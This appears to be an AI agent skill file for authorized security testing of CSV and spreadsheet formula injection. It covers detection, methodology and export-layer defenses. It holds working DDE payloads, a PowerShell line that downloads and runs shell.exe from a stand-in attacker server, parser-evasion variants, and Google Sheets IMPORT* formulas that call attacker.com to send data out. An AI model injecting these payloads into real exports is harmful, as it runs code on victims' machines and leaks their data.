--- name: csv-formula-injection description: >- CSV/spreadsheet formula injection (DDE, Excel/LibreOffice, Google Sheets IMPORT*). Use when exports, imports, or user fields feed spreadsheets or reporting tools. --- # SKILL: CSV Formula Injection > **AI LOAD INSTRUCTION**: This skill covers formula/DDE-style injection in CSV and spreadsheet contexts, obfuscation, cloud-sheet primitives, and safe testing methodology. Use only where **explicitly authorized**; payloads that invoke local commands or remote fetches are **impactful**—prefer lab targets and document consent. Do not target end users without program rules allowing client-side execution tests. ## 0. QUICK START Characters that may trigger formula evaluation when a cell is opened in Excel, LibreOffice Calc, or similar (often only if the cell is interpreted as a formula): ```text = + - @ ``` Test cells may look like: ```csv name,value test,=1+1 test,+1+1 test,-1+1 test,@SUM(1+1) ``` **Routing note**: when testing CSV exports, back-office reports, or user data opened in spreadsheets, prioritize these prefix characters. --- ## 1. DDE INJECTION (EXCEL / LIBREOFFICE) Dynamic Data Exchange (DDE) and external call patterns historically abused in spreadsheets. Examples for **controlled lab** reproduction: ```text DDE("cmd";"/C calc";"!A0")A0 ``` ```text @SUM(1+1)*cmd|' /C calc'!A0 ``` ```text =2+5+cmd|' /C calc'!A0 ``` ```text =cmd|' /C calc'!'A1' ``` PowerShell-style chaining (lab only; replace host and payload with benign equivalents): ```text =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 ``` --- ## 2. OBFUSCATION Defensive parsers may strip obvious patterns; testers may try noise and spacing (still only where allowed): ```text AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A ``` Extra whitespace after `=`: ```text = cmd|'/c calc.exe'!A ``` Dispersed characters / unusual spacing (conceptual pattern—adjust per parser): ```text = C m D |'/c calc.exe'!A ``` `rundll32` style: ```text =rundll32|'URL.dll,OpenURL calc.exe'!A ``` --- ## 3. GOOGLE SHEETS If exported data is later opened in **Google Sheets**, or sheets pull from untrusted CSV, these functions can cause **outbound requests** or **cross-document data pulls**: **Data exfiltration / probe (replace URL with your authorized callback):** ```text =IMPORTXML("http://attacker.com/", "//a/@href") ``` Other high-risk imports: ```text =IMPORTRANGE("spreadsheet_url", "range") =IMPORTHTML("http://attacker.com/table", "table", 1) =IMPORTFEED("http://attacker.com/feed.xml") =IMPORTDATA("http://attacker.com/data.csv") ``` Document which function executed and what network side effects occurred. --- ## 4. TESTING METHODOLOGY 1. **Map sinks** — Any feature that emits **CSV, XLSX, or tab-separated** output: admin exports, audit logs, user rosters, billing reports, search results. 2. **Trace user-controlled fields** — Profile fields, ticket titles, transaction memos, tags, filenames in ZIP exports—any column that echoes stored input. 3. **Inject formula prefixes** — Start with benign arithmetic (`=1+1`, `+1+1`) to detect evaluation; escalate only per rules. 4. **Open in target software** — Match victim workflow: Excel desktop, LibreOffice, Google Sheets import, locale-specific decimal separators. 5. **Evidence** — Screenshot/capture whether the cell shows a calculated result, a security warning, or DDE prompt; note product version. **Note**: focus on the `user input -> export -> opened in spreadsheet software` chain. --- ## 5. DEFENSE Application and export-layer mitigations: - **Prefix with single quote** — In many spreadsheet apps, leading `'` forces **text** interpretation: `'=cmd|...` displays literally. - **Prefix with tab** — Some pipelines treat tab-prefixed fields as non-formula text when ingested correctly. - **Strip or neutralize leading triggers** — Remove or escape leading `=`, `+`, `-`, `@` (and Unicode lookalikes) at export time. - **CSV encoding** — Use consistent quoting; validate column types; avoid passing raw formula strings into financial/reporting templates without sanitization. - **User education** — Do not enable external data / DDE without policy. Example safe export transformation (conceptual): ```text Input: =1+1 Output: '=1+1 OR \t=1+1 OR (empty prefix) with escaped quotes per RFC 4180 ``` **Note**: when correlating business exports, reports, and API export parameters, combine with injection, business-logic, and API-security skills.